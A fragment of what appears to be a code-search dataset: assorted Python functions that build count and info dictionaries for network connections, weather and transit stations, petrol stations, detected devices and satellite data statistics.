i[1]\n weekdays = i[2]\n if ip not in dict_info:\n dict_info[ip] = {}\n dict_info[ip]['counter'] = 0\n dict_info[ip]['hours'] = []\n dict_info[ip]['weekdays'] = []\n dict_info[ip]['counter'] += 1\n dict_info[ip]['hours'].append(hours)\n dict_info[ip]['weekdays'].append(weekdays)\n return dict_info", "def stats(series):\n\td={}\n\tfor index in series[\"Country Code\"].unique():\n\t\td[index]={\n\t\t\"total servers\" : len(series.loc[series[\"Country Code\"]==index]),\n\t\t\"lat\" : series.loc[series[\"Country Code\"]==index][\"LAT\"].iat[0],\n\t\t\"long\" : series.loc[series[\"Country Code\"]==index][\"LONG\"].iat[0]\n\t\t}\n\treturn d", "def _get_ogd_stations():\n return {r[\"Station\"] for r in ZamgData.current_observations()}", "def load(self):\n total = sum(self.connections.values())\n return total", "def network_to_dict(self):\n return reduce(lambda x,y: x.update(y) or x, \n [self.downstream(root) for root in self.roots])", "def getUsersBySSID():\n\tstats = {}\n\tms = MobileStation.objects.filter(ssid__isnull=False)\n\tfor ssid in set(MobileStation.objects.values_list('ssid', flat=True)):\n\t\tstats[ssid] = MobileStation.objects.areAssociated().filter(ssid=ssid).count()\n\treturn stats", "def get_connections_out(self) -> dict:\n return self.__ni_out", "def get_connections_in(self) -> dict:\n return self.__ni_in", "def totalConnections(analyzer):\n return model.totalConnections(analyzer)", "def result_count(sol,Nt,G):\r\n n = G.number_of_nodes()\r\n dict_freq={}\r\n for i in range(n):\r\n k=G.degree(i)\r\n if k not in dict_freq:\r\n dict_freq[k]=sol[Nt,i]\r\n else:\r\n dict_freq[k]+=sol[Nt,i]\r\n return dict_freq", "def device_values(mac_address,base_stations=[],start=datetime.datetime(2014,1,1,0),end=datetime.datetime(2015,1,1),resolution=1,verbose=False,start_date=None,end_date=None):\n\tif not start_date:\n\t\tstart_date = datetime.datetime(2014,1,1,0,0)\n\tif not end_date:\n\t\tend_date = datetime.datetime(2015,1,1,0,0)\n\t\n\tstart_unix = int(start_date.strftime('%s'))\n\tend_unix = int(end_date.strftime('%s'))\n\t\n\tdjango_devices = FoundDevices.objects.filter(time__range=(start_unix, end_unix),mac_address=mac_address).exclude(mac_address__in=base_stations).values()\n\t\n\tfound_devices = {}\n\tfor entry in django_devices:\n\t\tfound_devices[entry['found_id']] = {'mac_address':entry['mac_address'].encode(\"utf8\"),'station':str(entry['stations_id']),'time':entry['time'].encode(\"utf8\")}\n\t\n\t\n\n\n\tcount = {}\n\n\tstations = set()\n\n\tfor key in found_devices.keys():\n\t\tfound_time = time.localtime(float(found_devices[key]['time']))\n\t\ttime_found = datetime.datetime(found_time.tm_year,found_time.tm_mon,found_time.tm_mday,int(math.floor((found_time.tm_hour/resolution)*resolution)))\n\t\tstation = found_devices[key]['station']\n\t\tstations.add(station)\n\n\t\tif start <= time_found <= end and found_devices[key]['mac_address'] == mac_address:\n\t\t\tif time_found not in count:\n\t\t\t\tcount[time_found] = {'stations':{}}\n\t\t\t\tif station not in count[time_found]['stations'].keys():\n\t\t\t\t\tcount[time_found]['stations'][station] = 1\n\t\t\t\telse:\n\t\t\t\t\tcount[time_found]['stations'][station] += 1\n\n\t\t\telse:\n\t\t\t\tif station not in count[time_found]['stations'].keys():\n\t\t\t\t\tcount[time_found]['stations'][station] = 1\n\t\t\t\telse:\n\t\t\t\t\tcount[time_found]['stations'][station] += 1\n\n\tstart = min(count.keys())\n\tcurrent = min(count.keys())\n\tend = max(count.keys())\n\tstep = datetime.timedelta(hours=resolution)\n\tstations = list(stations)\n\twhile current < end:\n\t\tif current not in count.keys():\n\t\t\tcount[current] = {'stations':{}}\n\n\t\t\n\n\t\t\n\n\t\tcurrent += step\n\ttimes = count.keys()\n\ttimes.sort()\n\tfor current in times:\n\t\tfor station in stations:\n\t\t\t\tif station not in count[current]['stations'].keys():\n\t\t\t\t\tcount[current]['stations'][station] = 0\n\t\t\n\t\tprint current,' ',count[current]['stations']\n\n\treturn count", "def __len__(self):\n return len(self.stations)", "def __node_rep(self):\n node_list_dict = {}\n for (i, beam) in enumerate(self.beams):\n if str(beam['n1']) not in node_list_dict.keys():\n node_list_dict[str(beam['n1'])] = 1\n else:\n node_list_dict[str(beam['n1'])] += 1\n if str(beam['n2']) not in node_list_dict.keys():\n node_list_dict[str(beam['n2'])] = 1\n else:\n node_list_dict[str(beam['n2'])] += 1\n return node_list_dict", "def _create_freq_dist(self):\r\n freq_dict = dict()\r\n\r\n for element in self.data:\r\n if element in freq_dict:\r\n freq_dict[element] += 1\r\n else:\r\n freq_dict[element] = 1\r\n\r\n return freq_dict", "def getNbStations(self) :\n return len(self._stations)", "def current_queues(petrol_stations):\n current_queues = {}\n for number_of_station in petrol_stations:\n info = {}\n info['cars in the queue'] = 0\n info['max of queue'] = petrol_stations[number_of_station]['queue']\n current_queues[number_of_station] = info\n return current_queues", "def reload_infos(self):\n self.networks = {}\n networks = self.client.waveform.getNetworkIds()\n # Get stations.\n for key in networks:\n if not key:\n continue\n self.networks[key] = {}\n stations = self.client.waveform.getStationIds(network_id=key)\n for station in stations:\n if not station:\n continue\n self.networks[key][station] = {}\n # Get locations.\n locations = self.client.waveform.getLocationIds(network_id=key,\n station_id=station)\n for location in locations:\n channels = self.client.waveform.getChannelIds(\\\n network_id=key , station_id=station,\n location_id=location)\n self.networks[key][station][location] = [channels]\n # Add current date to Dictionary.\n self.networks['Date'] = UTCDateTime()\n # Also add the server to it.\n self.networks['Server'] = self.client.base_url\n # Open file.\n file = open(self.pickle_file, 'wb')\n pickle.dump(self.networks, file, protocol = 2)\n file.close()", "def get_socket_dictionary(self) -> dict:\n socket_dictionary = {\n \"action\": self.action,\n \"car_id\": self.car_id,\n \"username\": self.username,\n \"password\": self.password,\n \"usertoken\": self.usertoken,\n \"info_date_time\": self.info_date_time,\n \"current_location\": self.current_location,\n \"engineer_bluetooth\": self.engineer_bluetooth,\n \"engineer_code\": self.engineer_code\n }\n return socket_dictionary", "def result_count(sol,Nt,G):\r\n n = G.number_of_nodes()\r\n dict_freq={}\r\n for i in range(n):\r\n k=G.degree(i)\r\n if k not in dict_freq:\r\n dict_freq[k]=sol[Nt,i]\r\n else:\r\n dict_freq[k]+=sol[Nt,i]\r\n return dict_freq", "def data_petrol_stations():\n petrol_stations = {}\n with codecs.open('azs.txt', 'r', encoding='UTF-8') as file_in:\n for string in file_in.readlines():\n string = string.split()\n station_number = int(string[0])\n queue_length = int(string[1])\n petrol_stations[station_number] = {}\n petrol_stations[station_number]['queue'] = queue_length\n petrol_stations[station_number]['kinds'] = string[2:]\n\n return petrol_stations", "def stations():\n stats_all=session.query(stations.station).group_by(stations.station).all()\n station_df=pd.DataFrame(stats_all)\n station_dict= station_df.to_dict()\n return jsonify(station_dict)", "def get_online_register(self):\n res = {}\n count = 0\n for event in self.browse(self.id):\n res[event.id] = {}\n for registration in event.online_registration_ids:\n count += 1\n res[event.id] = count\n self.online_register_current = count\n return res", "def get_graph_dictionary(self):\n nodes = {}\n n = 0\n for node in self.__nodes:\n nodes[n] = tuple(node.get_data())\n n += 1\n\n edges = set()\n for edge in self.__edges:\n new_edge = (edge.get_node_a().get_id(), edge.get_node_b().get_id())\n edges.add(new_edge)\n\n graph_dict = {}\n graph_dict[\"nodes\"] = nodes\n graph_dict[\"edges\"] = edges\n\n return graph_dict", "def _aggregate_networks(self, hosts):\n nts = {}\n for host in hosts:\n # skip hosts which have low-level network names defined\n # this can be extended to pick network type based on the network name\n names = host.get(\"networks\")\n if names:\n continue\n nt = host.get(\"network\")\n if not self._is_network_type(nt):\n continue\n\n count = nts.get(nt, 0)\n count += 1\n nts[nt] = count\n return nts", "def create_count_map(self) -> Dict[int, int]:\n res: Dict[int, int] = {}\n for sequence_data in self.model.values():\n sequence_data: NGramsSequence = cast(NGramsSequence, sequence_data)\n for count in sequence_data.next_count.values():\n count: int = cast(int, count)\n if count not in res:\n res[count] = 0\n res[count] += 1\n self.count_map = res\n logger.success('created count map')\n return res", "def stats(self):\r\n return {}", "def GetTimeIntervalsForEachStation(PathInfo):\r\n\tTimeIntervalAtStation = {}\r\n\r\n\tif not PathInfo: return TimeIntervalAtStation\r\n\tif len(PathInfo) < 2: return TimeIntervalAtStation\r\n\r\n\tfor i in range(1, len(PathInfo)):\r\n\t\tConnection1 = PathInfo[i-1]\r\n\t\tConnection2 = PathInfo[i]\r\n\r\n\t\tTripID1 = Connection1[ConnInfoInd['travel_id']]\r\n\t\tTripID2 = Connection2[ConnInfoInd['travel_id']]\r\n\r\n\t\t# check if customer makes a change at station\r\n\t\t# if TripID1 == TripID2: continue\r\n\r\n\t\tstation = Connection2[ConnInfoInd['station_from']]\r\n\r\n\t\tArrivalMin = Connection1[ConnInfoInd['arrival_hour']]*60 + Connection1[ConnInfoInd['arrival_min']]\r\n\t\tDepartureMin = Connection2[ConnInfoInd['departure_hour']]*60 + Connection2[ConnInfoInd['departure_min']]\r\n\r\n\t\tif TimeIntervalAtStation.has_key(station):\r\n\t\t\tTimeIntervalAtStation[station].append((ArrivalMin, DepartureMin))\r\n\t\telse:\r\n\t\t\tTimeIntervalAtStation[station] = [(ArrivalMin, DepartureMin)]\r\n\treturn TimeIntervalAtStation", "def to_dict(self) -> Dict:\n _dict = {}\n if hasattr(self, 'virtual_connections') and self.virtual_connections is not None:\n _dict['virtual_connections'] = [x.to_dict() for x in self.virtual_connections]\n return _dict", "def getNrStations(self):\n return len(self.stationData)", "def create_stat_dic(stat_id, data_directories):\n station_dic = {}\n total_dim = []\n for d,i in data_directories.items():\n files = os.listdir(i)\n for f in files:\n Id = f.split('_'+d)[0]\n if Id == stat_id:\n if d not in station_dic.keys():\n station_dic[d] = [] \n station_dic[d].append(i + '/' + f)\n \n total_dim. append( os.path.getsize (i + '/' + f) )\n \n #print('FOUND!' , d , ' ' , f )\n \n size = sum(total_dim) \n return station_dic, size", "def stations ():\n # Query all passengers\n Stns= session.query(Measurement.station, func.count(Measurement.station)).group_by(Measurement.station).all()\n\n allStationns = list(np.ravel(Stns))\n\n return jsonify(allStations)", "def network_io_counters():\r\n f = open(\"/proc/net/dev\", \"r\")\r\n try:\r\n lines = f.readlines()\r\n finally:\r\n f.close()\r\n\r\n retdict = dict()\r\n for line in lines[2:]:\r\n colon = line.find(':')\r\n assert colon > 0, line\r\n name = line[:colon].strip()\r\n fields = line[colon + 1:].strip().split()\r\n bytes_recv = int(fields[0])\r\n packets_recv = int(fields[1])\r\n errin = int(fields[2])\r\n dropin = int(fields[2])\r\n bytes_sent = int(fields[8])\r\n packets_sent = int(fields[9])\r\n errout = int(fields[10])\r\n dropout = int(fields[11])\r\n retdict[name] = nt_net_iostat(bytes_sent, bytes_recv, packets_sent, packets_recv,\r\n errin, errout, dropin, dropout)\r\n return retdict", "def get_connections(capture):\n ip_dict = dict()\n for pkt in capture:\n\n if not hasattr(pkt, \"ip\") and not hasattr(pkt, \"ipv6\"):\n continue\n\n protocol = pkt.highest_layer\n\n tcp_dst_port = None\n tcp_src_port = None\n if hasattr(pkt, \"tcp\"):\n tcp_src_port = pkt.tcp.srcport\n tcp_dst_port = pkt.tcp.dstport\n\n if hasattr(pkt, \"ip\"):\n if pkt.ip.src.startswith(\"192.168.178\"):\n ip, dst = pkt.ip.src, pkt.ip.dst\n else:\n ip, dst = pkt.ip.dst, pkt.ip.src\n tcp_dst_port = tcp_src_port\n else:\n # TODO: how to discern src and dst in IPv6?\n ip, dst = pkt.ipv6.src, pkt.ipv6.dst\n\n ip = \"%s\" % ip\n dkey = (\n \"%s\" % protocol,\n int(tcp_dst_port) if tcp_dst_port else None,\n \"%s\" % dst\n )\n if ip not in ip_dict:\n ip_dict[ip] = {dkey: 1}\n else:\n ip_dict[ip][dkey] = ip_dict[ip].get(dkey, 0) + 1\n return ip_dict", "def get_network_info_dict(network):\n info_str = nx.info(network)\n lines = info_str.split('\\n')\n\n info_dict = {}\n for line in lines:\n pair = line.split(':')\n info_dict[pair[0]] = pair[1].strip()\n\n return info_dict", "def get_num_connections(self):\n\n synapses = 0\n for mat in self.weights:\n synapses += mat.size\n return synapses", "def instanceAnalysis(instance):\n arrivals = defaultdict(int)\n for event in instance:\n if isinstance(event, Arrival):\n arrivals[event.node] += 1\n return {key: arrivals[key] for key in sorted(arrivals.keys())}", "def _create_word_count_dict(self):\n word_counts = dict()\n for wc in self.word_counts.all():\n word_counts[wc.word.name] = wc.count\n return word_counts", "def minion_connection_stats(self, minions):\n\n online_minions = list()\n offline_minions = list()\n expired_minions = list()\n\n for minion_obj in minions:\n\n # get UTC current date time\n current_datetime = datetime.datetime.utcnow()\n current_datetime = current_datetime.replace(tzinfo=pytz.utc)\n\n # get the last seen date time\n last_seen = minion_obj.last_seen\n\n # get the time difference\n try:\n delta_diff = current_datetime - last_seen\n except Exception as err:\n delta_diff = None\n\n if delta_diff:\n days_count = delta_diff.days\n else:\n # just to make sure if empty datetime is handled\n days_count = 99999\n\n # is minion up since x days\n if days_count >= settings.MINION_EXPIRY:\n expired_minions.append(minion_obj)\n\n # get a list of minions up\n elif minion_obj.is_minion_up:\n online_minions.append(minion_obj)\n\n # get all offline minions\n elif not minion_obj.is_minion_up:\n offline_minions.append(minion_obj)\n\n return dict(online_minions=len(online_minions),\n expired_minions=len(expired_minions),\n offline_minions=len(offline_minions))", "def to_dict(self) -> Dict:\n _dict = {}\n if hasattr(self, 'name') and self.name is not None:\n _dict['name'] = self.name\n if hasattr(self, 'total_connections') and self.total_connections is not None:\n _dict['total_connections'] = self.total_connections\n return _dict", "def stations():\n\n # Open sessions\n session = Session(bind=engine)\n\n # Query DB for StationID and Station Name\n results=session.query(Station.station,Station.name).all()\n\n # Initiating an empty dictionary\n stations={}\n\n # Going over the results and storing them in stations dict reated previously\n for id,name in results:\n station={id:name}\n stations.update(station)\n\n # Main API dict that holds an info key and a stations key with the stations ids and names\n stationsAPI={'info':'Available stations responsible for the observations',\n 'stations':stations\n }\n \n # Returing the main dictionary in a JSON format API response \n return jsonify(stationsAPI)", "def network_dict(self):\n\n data = {}\n data['network'] = {\n 'weights': self._conv_weights + self._lin_weights,\n 'dims': self.net_dims,\n 'activation': 'relu',\n 'accuracy': self.accuracy,\n 'kernel_size': self.kernel_size\n }\n\n return data", "def to_dict (self):\n return {\n 'lengths': self.lengths,\n 'lowerCounts': self.lower_counts,\n 'upperCounts': self.upper_counts,\n 'digitCounts': self.digit_counts,\n 'symbolCounts': self.symbol_counts,\n 'classCounts': self.class_counts,\n 'wordCounts': self.word_counts\n }", "def stations(): \n # creating the Docstring\n session = Session(engine)\n\n # creat the Query stations\n\n stations_qu = session.query(measurement.station).group_by(measurement.station).all()\n\n # Converting the list of tuples into a normal list\n stations_qu_dict = list(np.ravel(stations_qu))\n session.close()\n\n return jsonify(stations_qu_dict)", "def count(wrd):\n ltrs = {}\n for i in wrd:\n ltrs[i] = wrd.count(i)\n return ltrs", "def count(self):\n count = {}\n\n for path, lines in self.lines_added.items():\n count[path] = count.get(path, 0) + sum(lines)\n\n for path, lines in self.lines_removed.items():\n count[path] = count.get(path, 0) + sum(lines)\n\n return count", "def stations():\n # Query all stations\n results = session.query(Measurement.station).group_by(Measurement.station).all()\n all_sessions = list(np.ravel(results))\n return jsonify(all_sessions)", "def collect_stations(self):\n # First, iterate provinces and build url's\n site = urllib.request.urlopen(self.base_url)\n\n # Check that the site is still valid or operating by collecting a list of provinces\n print(\"Collecting provinces\")\n provinces = [s[9:11] for s in re.findall('<a href=\"../\">../</a>', site.read())]\n\n # Iterate provinces and collect list of available times\n print(\"Collecting time periods and station ID's\")\n self.stations = defaultdict(dict)\n for prov in provinces:\n site = urllib.request.urlopen(self.build_url(prov))\n expression = '<a href=\"[hd][a-zA-Z]*/\">[hd][a-zA-Z]*/</a>'\n times = [s.split('>')[1].split('<')[0].replace('/', '') for s in re.findall(expression, site.read())]\n\n # Iterate times and collect the station ID's\n for time in times:\n site = urllib.request.urlopen(self.build_url(prov, time))\n expression = '<a href=\"{0}_[a-zA-Z0-9]*_{1}_hydrometric.csv\">{0}_[a-zA-Z0-9]*_{1}_hydrometric.csv</a>'\n expression = expression.format(prov.upper(), time.lower())\n stations = [s.split('_')[1] for s in re.findall(expression, site.read())]\n self.stations[prov][time] = stations", "def networks(self) -> dict:\n return self.data[\"networks\"]", "def stations():\n results = session.query(Station.station,Station.name).all()\n key=[results[i][0] for i in range(len(results))]\n values=[results[i][1] for i in range(len(results))]\n results=dict(zip(key,values))\n print(f\"Route /api/v1.0/stations is being visited\")\n return jsonify(results)", "def get_network_stats(net):\n return net.get_num_connections(), net.num_neurons, len(net.neurons_in_layer)", "def stations():\n\n return station_list", "def _get_as_dict_count(self):\n counter = Counter()\n for product in self.products:\n counter[product.id] += 1\n return counter", "def get_sensor_summary_info(self):\n import statistics\n info_dict = dict()\n logger.debug(\"Creating Database Engine and Session.\")\n db_engine = sqlalchemy.create_engine(self.db_info_obj.dbConn)\n session_sqlalc = sqlalchemy.orm.sessionmaker(bind=db_engine)\n ses = session_sqlalc()\n\n logger.debug(\"Find the scene count.\")\n vld_scn_count = ses.query(EDDSentinel1ASF).filter(EDDSentinel1ASF.Invalid == False).count()\n invld_scn_count = ses.query(EDDSentinel1ASF).filter(EDDSentinel1ASF.Invalid == True).count()\n dwn_scn_count = ses.query(EDDSentinel1ASF).filter(EDDSentinel1ASF.Downloaded == True).count()\n ard_scn_count = ses.query(EDDSentinel1ASF).filter(EDDSentinel1ASF.ARDProduct == True).count()\n dcload_scn_count = ses.query(EDDSentinel1ASF).filter(EDDSentinel1ASF.DCLoaded == True).count()\n arch_scn_count = ses.query(EDDSentinel1ASF).filter(EDDSentinel1ASF.Archived == True).count()\n info_dict['n_scenes'] = dict()\n info_dict['n_scenes']['n_valid_scenes'] = vld_scn_count\n info_dict['n_scenes']['n_invalid_scenes'] = invld_scn_count\n info_dict['n_scenes']['n_downloaded_scenes'] = dwn_scn_count\n info_dict['n_scenes']['n_ard_processed_scenes'] = ard_scn_count\n info_dict['n_scenes']['n_dc_loaded_scenes'] = dcload_scn_count\n info_dict['n_scenes']['n_archived_scenes'] = arch_scn_count\n logger.debug(\"Calculated the scene count.\")\n\n logger.debug(\"Find the scene file sizes.\")\n file_sizes = ses.query(EDDSentinel1ASF.Total_Size).filter(EDDSentinel1ASF.Invalid == False).all()\n if file_sizes is not None:\n if len(file_sizes) > 0:\n file_sizes_nums = list()\n for file_size in file_sizes:\n if file_size[0] is not None:\n file_sizes_nums.append(file_size[0])\n if len(file_sizes_nums) > 0:\n total_file_size = sum(file_sizes_nums)\n info_dict['file_size'] = dict()\n info_dict['file_size']['file_size_total'] = total_file_size\n if total_file_size > 0:\n info_dict['file_size']['file_size_mean'] = statistics.mean(file_sizes_nums)\n info_dict['file_size']['file_size_min'] = min(file_sizes_nums)\n info_dict['file_size']['file_size_max'] = max(file_sizes_nums)\n if len(file_sizes_nums) > 1:\n info_dict['file_size']['file_size_stdev'] = statistics.stdev(file_sizes_nums)\n info_dict['file_size']['file_size_median'] = statistics.median(file_sizes_nums)\n if (len(file_sizes_nums) > 1) and (eodatadown.py_sys_version_flt >= 3.8):\n info_dict['file_size']['file_size_quartiles'] = statistics.quantiles(file_sizes_nums)\n logger.debug(\"Calculated the scene file sizes.\")\n\n logger.debug(\"Find download and processing time stats.\")\n download_times = []\n ard_process_times = []\n scns = ses.query(EDDSentinel1ASF).filter(EDDSentinel1ASF.Downloaded == True)\n for scn in scns:\n download_times.append((scn.Download_End_Date - scn.Download_Start_Date).total_seconds())\n if scn.ARDProduct:\n ard_process_times.append((scn.ARDProduct_End_Date - scn.ARDProduct_Start_Date).total_seconds())\n\n if len(download_times) > 0:\n info_dict['download_time'] = dict()\n info_dict['download_time']['download_time_mean_secs'] = statistics.mean(download_times)\n info_dict['download_time']['download_time_min_secs'] = min(download_times)\n info_dict['download_time']['download_time_max_secs'] = max(download_times)\n if len(download_times) > 1:\n info_dict['download_time']['download_time_stdev_secs'] = statistics.stdev(download_times)\n info_dict['download_time']['download_time_median_secs'] = statistics.median(download_times)\n if (len(download_times) > 1) and (eodatadown.py_sys_version_flt >= 3.8):\n info_dict['download_time']['download_time_quartiles_secs'] = statistics.quantiles(download_times)\n\n if len(ard_process_times) > 0:\n info_dict['ard_process_time'] = dict()\n info_dict['ard_process_time']['ard_process_time_mean_secs'] = statistics.mean(ard_process_times)\n info_dict['ard_process_time']['ard_process_time_min_secs'] = min(ard_process_times)\n info_dict['ard_process_time']['ard_process_time_max_secs'] = max(ard_process_times)\n if len(ard_process_times) > 1:\n info_dict['ard_process_time']['ard_process_time_stdev_secs'] = statistics.stdev(ard_process_times)\n info_dict['ard_process_time']['ard_process_time_median_secs'] = statistics.median(ard_process_times)\n if (len(ard_process_times) > 1) and (eodatadown.py_sys_version_flt >= 3.8):\n info_dict['ard_process_time']['ard_process_time_quartiles_secs'] = statistics.quantiles(\n ard_process_times)\n logger.debug(\"Calculated the download and processing time stats.\")\n\n if self.calc_scn_usr_analysis():\n plgin_lst = self.get_usr_analysis_keys()\n info_dict['usr_plugins'] = dict()\n for plgin_key in plgin_lst:\n info_dict['usr_plugins'][plgin_key] = dict()\n scns = ses.query(EDDSentinel1ASFPlugins).filter(EDDSentinel1ASFPlugins.PlugInName == plgin_key).all()\n n_err_scns = 0\n n_complete_scns = 0\n n_success_scns = 0\n plugin_times = []\n for scn in scns:\n if scn.Completed:\n plugin_times.append((scn.End_Date - scn.Start_Date).total_seconds())\n n_complete_scns += 1\n if scn.Success:\n n_success_scns += 1\n if scn.Error:\n n_err_scns += 1\n info_dict['usr_plugins'][plgin_key]['n_success'] = n_success_scns\n info_dict['usr_plugins'][plgin_key]['n_completed'] = n_complete_scns\n info_dict['usr_plugins'][plgin_key]['n_error'] = n_err_scns\n if len(plugin_times) > 0:\n info_dict['usr_plugins'][plgin_key]['processing'] = dict()\n info_dict['usr_plugins'][plgin_key]['processing']['time_mean_secs'] = statistics.mean(plugin_times)\n info_dict['usr_plugins'][plgin_key]['processing']['time_min_secs'] = min(plugin_times)\n info_dict['usr_plugins'][plgin_key]['processing']['time_max_secs'] = max(plugin_times)\n if len(plugin_times) > 1:\n info_dict['usr_plugins'][plgin_key]['processing']['time_stdev_secs'] = statistics.stdev(plugin_times)\n info_dict['usr_plugins'][plgin_key]['processing']['time_median_secs'] = statistics.median(plugin_times)\n if (len(plugin_times) > 1) and (eodatadown.py_sys_version_flt >= 3.8):\n info_dict['usr_plugins'][plgin_key]['processing']['time_quartiles_secs'] = statistics.quantiles(plugin_times)\n ses.close()\n return info_dict", "def _make_dict(self, service):\n\n if service['ServiceAddress']:\n host = service['ServiceAddress']\n else:\n host = service['Address']\n \n\n info = {\n 'host': host,\n 'port': service['ServicePort']\n } \n\n return info;", "def info_about_petrol_kinds(petrol_stations):\n info_about_petrol_kinds = {}\n info_about_petrol_kinds['total amount of petrol'] = 0\n\n for number_of_petrol in petrol_stations:\n for petrol_name in petrol_stations[number_of_petrol]['kinds']:\n if petrol_name not in info_about_petrol_kinds:\n info = {}\n if petrol_name == 'АИ-80':\n price = 38.95\n elif petrol_name == 'АИ-92':\n price = 43.01\n elif petrol_name == 'АИ-95':\n price = 45.69\n elif petrol_name == 'АИ-98':\n price = 49.2\n info['price'] = price\n info['stations'] = [number_of_petrol]\n info['amount of petrol'] = 0\n info_about_petrol_kinds[petrol_name] = info\n else:\n info = info_about_petrol_kinds[petrol_name]\n info['stations'] = info['stations'] + [number_of_petrol]\n return info_about_petrol_kinds", "def connections_to_graph_dict(connections_array):\n graph_dict = {}\n for connection in connections_array:\n if connection[0] not in graph_dict:\n graph_dict[connection[0]] = []\n graph_dict[connection[0]].append(connection[1])\n return graph_dict", "def _get_wireguard_stats():\n\n num_wireguard = 0\n try:\n epoch_now = int(datetime.utcnow().timestamp())\n for peer in WireGuardPeer.yield_peers():\n if peer.is_handshake_recent(epoch_now):\n num_wireguard += 1\n except Exception as exc:\n logging.debug(\"Error getting wireguard connections: %s\", exc)\n\n return num_wireguard", "def _get_data(self):\n raw_data = self._get_raw_data()\n if not raw_data:\n return None\n result = {}\n for line in raw_data:\n if 'tcp' in line:\n parts = line.split()\n proto = parts[0]\n local_addr = parts[3]\n state = parts[5]\n ip, port = local_addr.rsplit(':', 1)\n port = str(port)\n result[port] = 1\n if state == 'LISTEN':\n if port not in self.charts['ports']:\n self.charts['ports'].add_dimension([port, port, 'absolute'])\n return result", "def summary_by_datacenter(self):\r\n datacenters = {}\r\n unique_vms = []\r\n unique_servers = []\r\n unique_network = []\r\n\r\n for vlan in self.list_vlans():\r\n datacenter = vlan['primaryRouter']['datacenter']\r\n name = datacenter['name']\r\n if name not in datacenters:\r\n datacenters[name] = {\r\n 'hardwareCount': 0,\r\n 'networkingCount': 0,\r\n 'primaryIpCount': 0,\r\n 'subnetCount': 0,\r\n 'virtualGuestCount': 0,\r\n 'vlanCount': 0,\r\n }\r\n\r\n datacenters[name]['vlanCount'] += 1\r\n\r\n for hardware in vlan['hardware']:\r\n if hardware['id'] not in unique_servers:\r\n datacenters[name]['hardwareCount'] += 1\r\n unique_servers.append(hardware['id'])\r\n\r\n for net in vlan['networkComponents']:\r\n if net['id'] not in unique_network:\r\n datacenters[name]['networkingCount'] += 1\r\n unique_network.append(net['id'])\r\n\r\n for virtual_guest in vlan['virtualGuests']:\r\n if virtual_guest['id'] not in unique_vms:\r\n datacenters[name]['virtualGuestCount'] += 1\r\n unique_vms.append(virtual_guest['id'])\r\n\r\n datacenters[name]['primaryIpCount'] += \\\r\n vlan['totalPrimaryIpAddressCount']\r\n datacenters[name]['subnetCount'] += len(vlan['subnets'])\r\n\r\n return datacenters", "def observation_space(self) -> Dict[str, Any]:", "def passengers():\n \n # Create session\n session = Session(engine)\n \n # Query\n stations = session.query(Station).count()\n\n return jsonify(stations)", "def device_info(self) -> Dict[str, any]:\n return {\n \"identifiers\": {\n (\n DOMAIN,\n self._api.information.serial,\n SynoSurveillanceStation.INFO_API_KEY,\n )\n },\n \"name\": \"Surveillance Station\",\n \"manufacturer\": \"Synology\",\n \"model\": self._api.information.model,\n \"sw_version\": self._version,\n \"via_device\": (DOMAIN, self._api.information.serial),\n }", "def count_minutes(found_devices,base_stations,start=datetime.datetime(2014,1,1),end=datetime.datetime(2015,1,1),resolution=15,stations=range(10),verbose=False):\n\n\tstations_int = list(stations)\n\tstations = [str(station) for station in stations_int]\n\n\n\tminute_count = {}\n\t\n\n\tfor key in found_devices.keys():\n\t\tif found_devices[key]['mac_address'] not in base_stations:\n\t\t\tfound_time = time.localtime(float(found_devices[key]['time']))\n\t\t\tminute = datetime.datetime(found_time.tm_year,found_time.tm_mon,found_time.tm_mday,found_time.tm_hour,int(math.floor((found_time.tm_min/resolution)*resolution)))\n\t\t\tif start <= minute <= end and found_devices[key]['station'] in stations:\n\t\t\t\tif minute not in minute_count.keys():\n\t\t\t\t\tminute_count[minute] = 1\n\n\t\t\t\telse:\n\t\t\t\t\tminute_count[minute] += 1\n\n\n\tfor key,value in minute_count.items():\n\t\tif verbose:\n\t\t\tprint key.strftime('%Y-%m-%d %H:%M'),': ',value\n\tkey = found_devices.keys()[6]\n\t#print minute_count.keys()\n\t#assert 0, '%s\\t%s\\t%s\\t%s'%(len(found_devices),found_devices[key],len(base_stations),len(minute_count))\n\treturn minute_count", "def counts(self):\n\n counts = defaultdict(int)\n\n for i, geom in zip(self.tree_ids, self.tree):\n point_int = list(self.sindex.intersection(geom.bounds))\n if point_int:\n counts[i] += len(point_int)\n\n return dict(counts)", "def get_station_info(config_dict):\n stn_info = dict()\n if config_dict is not None:\n if 'Station' in config_dict:\n stn_info['location'] = weeutil.weeutil.list_as_string(config_dict['Station'].get('location'))\n stn_info['latitude'] = config_dict['Station'].get('latitude')\n stn_info['longitude'] = config_dict['Station'].get('longitude')\n stn_info['altitude'] = config_dict['Station'].get('altitude')\n if 'station_type' in config_dict['Station']:\n stn_info['station_type'] = config_dict['Station']['station_type']\n if stn_info['station_type'] in config_dict:\n stn_info['driver'] = config_dict[stn_info['station_type']]['driver']\n if 'StdReport' in config_dict:\n stn_info['units'] = get_unit_info(config_dict)\n\n return stn_info", "def channels(self,station=[]):\n #{{{ function to return list of valid channels\n chans = {}\n\n if station:\n\n for sta in station:\n if sta in self.stachan_cache:\n\n for ch in self.stachan_cache[sta]:\n\n chans[ch] = 1\n else:\n\n return False\n else:\n\n for st in self.stachan_cache.keys():\n\n for ch in self.stachan_cache[st]:\n\n chans[ch] = 1\n\n return chans.keys()", "def get_num_stations(add):\r\n name=get_zipcode_names(add)\r\n engine = get_sql_engine()\r\n station_stats = text(\r\n \"\"\"\r\n SELECT\r\n count(v.*) as num_stations\r\n FROM indego_rt1130 as v\r\n JOIN philly_zipcode as n\r\n ON ST_Intersects(v.geom, n.geom)\r\n WHERE n.code = :name\r\n \"\"\"\r\n )\r\n resp = engine.execute(station_stats, name=name).fetchone()\r\n return resp[\"num_stations\"]", "def _created_connections(self):\n return len(self._available_connections) + len(self._in_use_connections)", "def get_dict_pairings_lists_lengths(list_of_possible_pairs_lists, graph_instance):\n pairings_lengths_dict = {}\n\n for possible_pairing_list in list_of_possible_pairs_lists:\n\n pairings_list_length = 0\n\n pairings_lengths_dict[tuple(possible_pairing_list)] = pairings_list_length\n\n for pair in possible_pairing_list:\n start_node = pair[0]\n end_node = pair[1]\n\n shortest_route_nodes_list = get_shortest_route_two_nodes(\n start_node, end_node, graph_instance\n )\n shortest_route_edges = get_route_edges_from_route(shortest_route_nodes_list)\n total_route_length = get_route_length(\n shortest_route_edges, graph_instance.edges_dict\n )\n pairings_list_length += total_route_length\n pairings_lengths_dict[tuple(possible_pairing_list)] = pairings_list_length\n\n return pairings_lengths_dict", "def station_analysis(data):\n 